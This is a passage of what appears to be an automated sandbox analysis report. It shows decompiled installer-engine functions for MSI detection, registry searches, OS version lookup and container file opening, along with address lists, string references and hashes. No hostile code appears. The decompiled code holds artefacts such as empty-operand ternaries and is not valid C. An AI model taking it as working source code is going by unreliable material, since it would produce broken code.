                                                                                                                                                                  							_t223 = _t256;
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(__eflags > 0) {
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _t252 - _t249;
                                                                                                                                                                  						if(_t252 <= _t249) {
                                                                                                                                                                  							goto L11;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L6;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push( *(_t232 + 0x90));
                                                                                                                                                                  				goto L91;
                                                                                                                                                                  			}































































                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041af81
                                                                                                                                                                  0x0041af83
                                                                                                                                                                  0x0041b212
                                                                                                                                                                  0x0041b213
                                                                                                                                                                  0x0041b218
                                                                                                                                                                  0x0041b218
                                                                                                                                                                  0x0041b219
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b21e
                                                                                                                                                                  0x0041af89
                                                                                                                                                                  0x0041af90
                                                                                                                                                                  0x0041af9d
                                                                                                                                                                  0x0041af9f
                                                                                                                                                                  0x0041afa1
                                                                                                                                                                  0x0041b1f8
                                                                                                                                                                  0x0041b1f9
                                                                                                                                                                  0x0041b202
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b207
                                                                                                                                                                  0x0041afa7
                                                                                                                                                                  0x0041afaa
                                                                                                                                                                  0x0041afad
                                                                                                                                                                  0x0041afb0
                                                                                                                                                                  0x0041afb3
                                                                                                                                                                  0x0041afe4
                                                                                                                                                                  0x0041afe4
                                                                                                                                                                  0x0041afe7
                                                                                                                                                                  0x0041b018
                                                                                                                                                                  0x0041b018
                                                                                                                                                                  0x0041b01b
                                                                                                                                                                  0x0041b01e
                                                                                                                                                                  0x0041b094
                                                                                                                                                                  0x0041b094
                                                                                                                                                                  0x0041b097
                                                                                                                                                                  0x0041b0c5
                                                                                                                                                                  0x0041b099
                                                                                                                                                                  0x0041b099
                                                                                                                                                                  0x0041b09d
                                                                                                                                                                  0x0041b0bf
                                                                                                                                                                  0x0041b09f
                                                                                                                                                                  0x0041b0a2
                                                                                                                                                                  0x0041b0a4
                                                                                                                                                                  0x0041b0a4
                                                                                                                                                                  0x0041b09d
                                                                                                                                                                  0x0041b0f0
                                                                                                                                                                  0x0041b0f8
                                                                                                                                                                  0x0041b0fb
                                                                                                                                                                  0x0041b107
                                                                                                                                                                  0x0041b11f
                                                                                                                                                                  0x0041b121
                                                                                                                                                                  0x0041b123
                                                                                                                                                                  0x0041b1ea
                                                                                                                                                                  0x0041b1eb
                                                                                                                                                                  0x0041ae86
                                                                                                                                                                  0x0041ae86
                                                                                                                                                                  0x0041ae8b
                                                                                                                                                                  0x0041ae90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b123
                                                                                                                                                                  0x0041b020
                                                                                                                                                                  0x0041b026
                                                                                                                                                                  0x0041b027
                                                                                                                                                                  0x0041b02e
                                                                                                                                                                  0x0041b031
                                                                                                                                                                  0x0041b032
                                                                                                                                                                  0x0041b035
                                                                                                                                                                  0x0041b036
                                                                                                                                                                  0x0041b03a
                                                                                                                                                                  0x0041b040
                                                                                                                                                                  0x0041b042
                                                                                                                                                                  0x0041b0a9
                                                                                                                                                                  0x0041b0b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b0b8
                                                                                                                                                                  0x0041b051
                                                                                                                                                                  0x0041b053
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b055
                                                                                                                                                                  0x0041b057
                                                                                                                                                                  0x0041b059
                                                                                                                                                                  0x0041b05c
                                                                                                                                                                  0x0041b079
                                                                                                                                                                  0x0041b079
                                                                                                                                                                  0x0041b07c
                                                                                                                                                                  0x0041b07e
                                                                                                                                                                  0x0041b08c
                                                                                                                                                                  0x0041b08c
                                                                                                                                                                  0x0041b08e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b08e
                                                                                                                                                                  0x0041b080
                                                                                                                                                                  0x0041b082
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b088
                                                                                                                                                                  0x0041b08a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b08a
                                                                                                                                                                  0x0041b05e
                                                                                                                                                                  0x0041b061
                                                                                                                                                                  0x0041b064
                                                                                                                                                                  0x0041b066
                                                                                                                                                                  0x0041b069
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b06b
                                                                                                                                                                  0x0041b06c
                                                                                                                                                                  0x0041b06f
                                                                                                                                                                  0x0041b072
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b074
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b078
                                                                                                                                                                  0x0041afe9
                                                                                                                                                                  0x0041afec
                                                                                                                                                                  0x0041b004
                                                                                                                                                                  0x0041b007
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b00d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b00f
                                                                                                                                                                  0x0041b012
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b012
                                                                                                                                                                  0x0041afee
                                                                                                                                                                  0x0041aff1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aff7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041aff9
                                                                                                                                                                  0x0041affc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b002
                                                                                                                                                                  0x0041afb5
                                                                                                                                                                  0x0041afb8
                                                                                                                                                                  0x0041afd0
                                                                                                                                                                  0x0041afd3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041afd9

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get version for product in machine context: %ls, xrefs: 0041B213
                                                                                                                                                                  • msiengine.cpp, xrefs: 0041AE86, 0041B29D, 0041B2B4
                                                                                                                                                                  • Language, xrefs: 0041B027
                                                                                                                                                                  • Failed to query feature state., xrefs: 0041B28B
                                                                                                                                                                  • Invalid state value., xrefs: 0041B2A7
                                                                                                                                                                  • UX aborted detect., xrefs: 0041B2BE
                                                                                                                                                                  • VersionString, xrefs: 0041AD6E, 0041AF20, 0041AF54
                                                                                                                                                                  • Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 0041B1FC
                                                                                                                                                                  • Failed to get version for product in user unmanaged context: %ls, xrefs: 0041B1E3
                                                                                                                                                                  • Failed to enum related products., xrefs: 0041B226
                                                                                                                                                                  • UX aborted detect related MSI package., xrefs: 0041AE90
                                                                                                                                                                  • Failed to get product information for ProductCode: %ls, xrefs: 0041AEB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msiengine.cpp
                                                                                                                                                                  • API String ID: 1659193697-1711659797
                                                                                                                                                                  • Opcode ID: 3c9a20a6af060f4f4e3647fcb001ab4524b3d1ecd76251296628347b466acc1a
                                                                                                                                                                  • Instruction ID: d8e3f27c74d760661e4357b4dae28699aeba8221b776db2d1bcf8fcb14407412
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c9a20a6af060f4f4e3647fcb001ab4524b3d1ecd76251296628347b466acc1a
                                                                                                                                                                  • Instruction Fuzzy Hash: EE02CD31D00214AFDB219FA5CC85EEEBBB5FF48300F24416BE905AB255D7389985CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                                                  			E00406286(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				signed short _t53;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  				signed short _t62;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  
                                                                                                                                                                  				_t57 = _a4;
                                                                                                                                                                  				_t67 = 1;
                                                                                                                                                                  				_t35 =  !=  ? 0x101 : 1;
                                                                                                                                                                  				_a4 =  !=  ? 0x101 : 1;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				if(E00403A92(_a8,  *((intOrPtr*)(_t57 + 0x1c)),  &_v8, 0) >= 0) {
                                                                                                                                                                  					_t69 = E004324D5( *((intOrPtr*)(_t57 + 0x18)), _v8, _a4,  &_v16);
                                                                                                                                                                  					if(_t69 < 0) {
                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                  						if(_t69 != 0x80070002) {
                                                                                                                                                                  							_push("Failed to open registry key. Key = \'%ls\'");
                                                                                                                                                                  							_push(_t69);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  							_t73 = _t73 + 0xc;
                                                                                                                                                                  							L18:
                                                                                                                                                                  							if(_t69 < 0) {
                                                                                                                                                                  								_push(_t69);
                                                                                                                                                                  								E00430F28(2, "RegistrySearchExists failed: ID \'%ls\', HRESULT 0x%x", _v8);
                                                                                                                                                                  							}
                                                                                                                                                                  							L20:
                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                  								E004380AB(_v8);
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_v12 != 0) {
                                                                                                                                                                  								E004380AB(_v12);
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_v16 != 0) {
                                                                                                                                                                  								RegCloseKey(_v16);
                                                                                                                                                                  							}
                                                                                                                                                                  							return _t69;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Registry key not found. Key = \'%ls\'");
                                                                                                                                                                  						_push(2);
                                                                                                                                                                  						E00430F28();
                                                                                                                                                                  						_t73 = _t73 + 0xc;
                                                                                                                                                                  						L14:
                                                                                                                                                                  						_t67 = 0;
                                                                                                                                                                  						L15:
                                                                                                                                                                  						asm("cdq");
                                                                                                                                                                  						_t69 = E004045DF(_a8,  *((intOrPtr*)(_t57 + 4)), _t67, 0, 0);
                                                                                                                                                                  						if(_t69 >= 0) {
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to set variable.");
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_push(_t69);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						goto L18;
                                                                                                                                                                  					}
                                                                                                                                                                  					if( *((intOrPtr*)(_t57 + 0x20)) == 0) {
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t69 = E00403A92(_a8,  *((intOrPtr*)(_t57 + 0x20)),  &_v12, 0);
                                                                                                                                                                  					if(_t69 >= 0) {
                                                                                                                                                                  						_t53 = RegQueryValueExW(_v16, _v12, 0,  &_v20, 0, 0);
                                                                                                                                                                  						_t62 = _t53;
                                                                                                                                                                  						if(_t62 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t62 == 0) {
                                                                                                                                                                  							_push(_v12);
                                                                                                                                                                  							E00430F28(2, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v8);
                                                                                                                                                                  							_t73 = _t73 + 0x10;
                                                                                                                                                                  							goto L14;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_t53 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t72 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t69 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "search.cpp", 0x30f, _t69);
                                                                                                                                                                  						_push("Failed to query registry key value.");
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to format value string.");
                                                                                                                                                                  					goto L10;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to format key string.");
                                                                                                                                                                  				goto L10;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 004062BE
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406305
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,000000F8,000000F8,00000000,000000F8), ref: 0040640F
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 0040635A
                                                                                                                                                                  • Failed to format key string., xrefs: 004062C9
                                                                                                                                                                  • Failed to format value string., xrefs: 00406310
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00406379
                                                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 004063DB
                                                                                                                                                                  • Failed to set variable., xrefs: 004063BE
                                                                                                                                                                  • Failed to query registry key value., xrefs: 00406364
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 00406395
                                                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 004063C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                  • API String ID: 2348241696-46557908
                                                                                                                                                                  • Opcode ID: 92fe179a015c548b4d30b61766c10e2e3b9a11aa8ed6f21fc85f9485cfada65a
                                                                                                                                                                  • Instruction ID: 77e6a505d1c92e640da6a25a527f16b36357aa78925d8139f6e8a13f339cf427
                                                                                                                                                                  • Opcode Fuzzy Hash: 92fe179a015c548b4d30b61766c10e2e3b9a11aa8ed6f21fc85f9485cfada65a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9941F331E00214BBDF15AE95CC02BAEBAA5AF48310F11417BFD01B51D1D7798E20AAD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E004031B4(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed short _v16;
                                                                                                                                                                  				signed short _v284;
                                                                                                                                                                  				signed short _v288;
                                                                                                                                                                  				char _v292;
                                                                                                                                                                  				struct HINSTANCE__* _v296;
                                                                                                                                                                  				signed short _v300;
                                                                                                                                                                  				intOrPtr _v308;
                                                                                                                                                                  				signed int _v312;
                                                                                                                                                                  				signed int _v316;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t29;
                                                                                                                                                                  				struct HINSTANCE__** _t34;
                                                                                                                                                                  				signed short _t35;
                                                                                                                                                                  				signed short _t38;
                                                                                                                                                                  				signed short _t48;
                                                                                                                                                                  				signed short _t53;
                                                                                                                                                                  				signed short _t55;
                                                                                                                                                                  				signed short _t58;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				signed int* _t72;
                                                                                                                                                                  				signed short _t74;
                                                                                                                                                                  				signed short _t77;
                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                  
                                                                                                                                                                  				_t70 = __edx;
                                                                                                                                                                  				_t29 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t29 ^ _t81;
                                                                                                                                                                  				_t61 = _a8;
                                                                                                                                                                  				_v296 = 0;
                                                                                                                                                                  				E004267C0(_a8, __ecx, _t71, 0, __eflags);
                                                                                                                                                                  				_t72 =  &_v316;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t34 =  &_v296;
                                                                                                                                                                  				__imp__GetModuleHandleExW(0, L"ntdll", _t34,  &_v292, 0, 0x11c);
                                                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                                                  					_t35 = GetProcAddress(_v296, "RtlGetVersion");
                                                                                                                                                                  					__eflags = _t35;
                                                                                                                                                                  					if(_t35 != 0) {
                                                                                                                                                                  						_v292 = 0x11c;
                                                                                                                                                                  						_t74 =  *_t35( &_v292);
                                                                                                                                                                  						__eflags = _t74;
                                                                                                                                                                  						if(_t74 >= 0) {
                                                                                                                                                                  							_t38 = _a4 - 1;
                                                                                                                                                                  							__eflags = _t38;
                                                                                                                                                                  							if(_t38 == 0) {
                                                                                                                                                                  								L12:
                                                                                                                                                                  								_t21 =  &_v316;
                                                                                                                                                                  								 *_t21 = _v316 & 0x00000000;
                                                                                                                                                                  								__eflags =  *_t21;
                                                                                                                                                                  								asm("cdq");
                                                                                                                                                                  								_v308 = 3;
                                                                                                                                                                  								_v312 = (_v288 & 0x0000ffff) << 0x00000010 | _v284 & 0x0000ffff;
                                                                                                                                                                  								L13:
                                                                                                                                                                  								_t74 = E00418BE2( &_v316, _t61);
                                                                                                                                                                  								__eflags = _t74;
                                                                                                                                                                  								if(_t74 >= 0) {
                                                                                                                                                                  									goto L16;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to set variant value.");
                                                                                                                                                                  								goto L15;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t48 = _t38 - 1;
                                                                                                                                                                  							__eflags = _t48;
                                                                                                                                                                  							if(_t48 == 0) {
                                                                                                                                                                  								_v300 = _v300 & 0x00000000;
                                                                                                                                                                  								E00432058( &_v292, GetCurrentProcess(),  &_v300);
                                                                                                                                                                  								__eflags = _v300;
                                                                                                                                                                  								if(_v300 == 0) {
                                                                                                                                                                  									goto L13;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t48 == 1;
                                                                                                                                                                  							if(_t48 == 1) {
                                                                                                                                                                  								_t53 = _v16;
                                                                                                                                                                  								__eflags = 0 - _t53;
                                                                                                                                                                  								if(0 != _t53) {
                                                                                                                                                                  									asm("cdq");
                                                                                                                                                                  									_v316 = _t53 & 0x0000ffff;
                                                                                                                                                                  									_v312 = _t70;
                                                                                                                                                                  									_v308 = 1;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to get OS info.");
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t55 = GetLastError();
                                                                                                                                                                  					__eflags = _t55;
                                                                                                                                                                  					_t77 =  <=  ? _t55 : _t55 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					__eflags = _t77;
                                                                                                                                                                  					_t74 =  >=  ? 0x80004005 : _t77;
                                                                                                                                                                  					E004300D9(0x80004005, "variable.cpp", 0x57b, _t74);
                                                                                                                                                                  					_push("Failed to locate RtlGetVersion.");
                                                                                                                                                                  					goto L15;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t58 = GetLastError();
                                                                                                                                                                  					_t80 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t74 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "variable.cpp", 0x575, _t74);
                                                                                                                                                                  					_push("Failed to locate NTDLL.");
                                                                                                                                                                  					L15:
                                                                                                                                                                  					_push(_t74);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					L16:
                                                                                                                                                                  					if(_v296 != 0) {
                                                                                                                                                                  						FreeLibrary(_v296);
                                                                                                                                                                  					}
                                                                                                                                                                  					return L004267AF(_t74, _v8 ^ _t81, _t72, _t74);
                                                                                                                                                                  				}
                                                                                                                                                                  			}
                                                                                                                                                                  0x004032ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004032bf
                                                                                                                                                                  0x004032ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004032ab
                                                                                                                                                                  0x0040325a
                                                                                                                                                                  0x00403269
                                                                                                                                                                  0x0040326b
                                                                                                                                                                  0x00403273
                                                                                                                                                                  0x00403275
                                                                                                                                                                  0x00403283
                                                                                                                                                                  0x00403288
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040320d
                                                                                                                                                                  0x0040320d
                                                                                                                                                                  0x0040321e
                                                                                                                                                                  0x00403228
                                                                                                                                                                  0x00403236
                                                                                                                                                                  0x0040323b
                                                                                                                                                                  0x0040334e
                                                                                                                                                                  0x0040334e
                                                                                                                                                                  0x0040334f
                                                                                                                                                                  0x00403356
                                                                                                                                                                  0x0040335d
                                                                                                                                                                  0x00403365
                                                                                                                                                                  0x00403365
                                                                                                                                                                  0x0040337b
                                                                                                                                                                  0x0040337b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00403203
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040320D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00403250
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040325A
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00403365
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                  • API String ID: 3057421322-109962352
                                                                                                                                                                  • Opcode ID: 9e0124d37f273bc032000de51e3c5cea7de257848c4fe8a0ef6f03f4a23bcf81
                                                                                                                                                                  • Instruction ID: 7c8cdbe08d43eea22cdbe99aa2ae2b22f00f283c4789ca0ae23ce7a78345e865
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e0124d37f273bc032000de51e3c5cea7de257848c4fe8a0ef6f03f4a23bcf81
                                                                                                                                                                  • Instruction Fuzzy Hash: B241A731901638ABDB249F659C467EABAF8EB08705F1001ABFD44F6180DB789F45CA9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E00418F44(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
                                                                                                                                                                  				void* _t29;
                                                                                                                                                                  				union _LARGE_INTEGER* _t33;
                                                                                                                                                                  				signed short _t40;
                                                                                                                                                                  				signed short _t43;
                                                                                                                                                                  				void* _t47;
                                                                                                                                                                  				signed short _t48;
                                                                                                                                                                  				HANDLE* _t51;
                                                                                                                                                                  				intOrPtr _t52;
                                                                                                                                                                  				long _t56;
                                                                                                                                                                  				union _LARGE_INTEGER _t68;
                                                                                                                                                                  
                                                                                                                                                                  				_t52 = _a8;
                                                                                                                                                                  				_t51 = _a4;
                                                                                                                                                                  				_t3 = _t52 + 4; // 0xf44d89c8
                                                                                                                                                                  				_t51[6] =  *_t3;
                                                                                                                                                                  				_t5 = _t52 + 0x18; // 0x195
                                                                                                                                                                  				_t51[4] =  *_t5;
                                                                                                                                                                  				_t7 = _t52 + 0x1c; // 0x2f07d83
                                                                                                                                                                  				_t51[5] =  *_t7;
                                                                                                                                                                  				_t9 = _t52 + 0x40; // 0x50e0458d
                                                                                                                                                                  				_t56 = 0;
                                                                                                                                                                  				_t51[2] =  *_t9;
                                                                                                                                                                  				_t12 = _t52 + 0x44; // 0xfff875ff
                                                                                                                                                                  				_t68 = 0;
                                                                                                                                                                  				_t51[3] =  *_t12;
                                                                                                                                                                  				if(_a12 != 0xffffffff) {
                                                                                                                                                                  					_t29 = GetCurrentProcess();
                                                                                                                                                                  					if(DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2) != 0) {
                                                                                                                                                                  						_t68 = 0;
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t43 = GetLastError();
                                                                                                                                                                  						_t63 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t56 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "container.cpp", 0xe7, _t56);
                                                                                                                                                                  						_push(_a16);
                                                                                                                                                                  						_push("Failed to duplicate handle to container: %ls");
                                                                                                                                                                  						goto L5;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                                                                                                                  					 *_t51 = _t47;
                                                                                                                                                                  					if(_t47 != 0xffffffff) {
                                                                                                                                                                  						L7:
                                                                                                                                                                  						if( *((intOrPtr*)(_a8 + 0xc)) == _t56) {
                                                                                                                                                                  							_t33 = _t56;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t68 = _t51[2];
                                                                                                                                                                  							_t33 = _t51[3];
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_t56);
                                                                                                                                                                  						if(SetFilePointerEx( *_t51, _t68, _t33, _t56) != 0) {
                                                                                                                                                                  							if(_t51[6] == 1) {
                                                                                                                                                                  								_t56 = E004240D7(_t51, _a16);
                                                                                                                                                                  								if(_t56 < 0) {
                                                                                                                                                                  									_push("Failed to open container.");
                                                                                                                                                                  									goto L15;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t40 = GetLastError();
                                                                                                                                                                  							_t60 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t56 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "container.cpp", 0xf3, _t56);
                                                                                                                                                                  							_push("Failed to move file pointer to container offset.");
                                                                                                                                                                  							L15:
                                                                                                                                                                  							_push(_t56);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t48 = GetLastError();
